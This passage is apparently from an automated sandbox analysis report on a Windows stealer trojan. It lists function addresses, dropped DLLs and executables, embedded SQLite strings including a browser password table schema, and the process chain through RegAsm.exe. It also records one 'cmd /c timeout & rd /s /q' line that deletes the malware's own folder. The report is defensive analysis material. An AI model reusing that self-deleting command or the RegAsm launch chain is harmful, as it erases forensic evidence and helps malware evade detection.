                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6753C83_2_6C6753C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60F3803_2_6C60F380
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6BAC603_2_6C6BAC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C78AC303_2_6C78AC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C776C003_2_6C776C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70ECD03_2_6C70ECD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6AECC03_2_6C6AECC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77ED703_2_6C77ED70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DAD503_2_6C7DAD50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83CDC03_2_6C83CDC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C838D203_2_6C838D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6B4DB03_2_6C6B4DB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C746D903_2_6C746D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C74EE703_2_6C74EE70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C790E203_2_6C790E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6BAEC03_2_6C6BAEC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C750EC03_2_6C750EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C736E903_2_6C736E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C772F703_2_6C772F70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71EF403_2_6C71EF40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F0F203_2_6C7F0F20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6B6F103_2_6C6B6F10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C78EFF03_2_6C78EFF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6B0FE03_2_6C6B0FE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F8FB03_2_6C7F8FB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6BEFB03_2_6C6BEFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7848403_2_6C784840
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7008203_2_6C700820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73A8203_2_6C73A820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B68E03_2_6C7B68E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E89603_2_6C6E8960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7069003_2_6C706900
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CC9E03_2_6C7CC9E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E49F03_2_6C6E49F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7709B03_2_6C7709B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7409A03_2_6C7409A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C76A9A03_2_6C76A9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72CA703_2_6C72CA70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C768A303_2_6C768A30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C75EA003_2_6C75EA00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72EA803_2_6C72EA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B6BE03_2_6C7B6BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C750BA03_2_6C750BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C84603_2_6C6C8460
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73A4303_2_6C73A430
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7144203_2_6C714420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004101A010_2_004101A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00446DCB10_2_00446DCB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040100010_2_00401000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040702010_2_00407020
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0041508C10_2_0041508C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004480A010_2_004480A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004221A010_2_004221A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0044424010_2_00444240
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040B27010_2_0040B270
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040C21010_2_0040C210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043821010_2_00438210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004432E010_2_004432E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004012F210_2_004012F2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042D29510_2_0042D295
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040937E10_2_0040937E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040532010_2_00405320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004073D010_2_004073D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040138D10_2_0040138D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042A3A810_2_0042A3A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042847210_2_00428472
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042D4D410_2_0042D4D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042C51010_2_0042C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004365E010_2_004365E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040158910_2_00401589
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043059010_2_00430590
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043167010_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042C6E110_2_0042C6E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004486E010_2_004486E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040A68010_2_0040A680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040877010_2_00408770
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040B70010_2_0040B700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040378010_2_00403780
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043682010_2_00436820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042B83010_2_0042B830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043F8E010_2_0043F8E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042E92710_2_0042E927
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042DB4B10_2_0042DB4B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00411B5010_2_00411B50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040ABD010_2_0040ABD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00448BE010_2_00448BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00447BE010_2_00447BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043EC6010_2_0043EC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00407DD010_2_00407DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0041DDFF10_2_0041DDFF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040CF1010_2_0040CF10
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\ECBKKKFHCF.exe 43DD8FCF131F4B471D17CBBCF8BD7C0E3C9354D9727E8FE4A8CD763029E4D98C
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8309D0 appears 82 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040EBD0 appears 171 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C63CBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C6494D0 appears 90 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CCF0 appears 51 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004104E7 appears 36 times
                          Source: file.exeStatic PE information: invalid certificate
                          Source: file.exe, 00000000.00000002.2142456053.00000000013FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: ECBKKKFHCF.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 66fe13d251bbf_lsod[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/24@12/12
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C667030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C667030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,3_2_00411807
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: AAAAKJ.3.dr, FCAAEB.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: file.exeVirustotal: Detection: 27%
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\ECBKKKFHCF.exe "C:\ProgramData\ECBKKKFHCF.exe"
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\ECBKKKFHCF.exe "C:\ProgramData\ECBKKKFHCF.exe" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exitJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
